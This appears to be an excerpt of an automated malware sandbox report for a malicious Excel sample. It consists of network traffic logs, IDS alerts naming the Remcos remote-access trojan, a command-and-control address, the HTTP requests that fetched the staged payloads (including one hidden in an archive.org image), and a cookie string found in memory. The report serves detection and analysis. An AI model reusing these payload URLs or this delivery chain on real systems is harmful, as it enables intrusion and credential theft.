                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 192.3.101.172:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 192.3.101.172:2404
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 198.12.81.228:80 -> 192.168.2.22:49172
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 198.12.81.228:80 -> 192.168.2.22:49172
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49171
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 192.3.101.172
                  Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /600/RGGV.txt HTTP/1.1Host: 198.12.81.228Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 207.241.232.154 207.241.232.154
                  Source: Joe Sandbox ViewIP Address: 88.99.66.38 88.99.66.38
                  Source: Joe Sandbox ViewIP Address: 192.3.101.172 192.3.101.172
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49175 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /UlEYs1 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.228Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /600/creatednewimagesinpicturebuttersmooth.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.228Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49165 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.12.81.228
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,14_2_0041B411
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFA7CAA3.emfJump to behavior
                  Source: global trafficHTTP traffic detected: GET /UlEYs1 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.228Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /600/creatednewimagesinpicturebuttersmooth.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.228Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /600/RGGV.txt HTTP/1.1Host: 198.12.81.228Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: bhvA42C.tmp.15.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
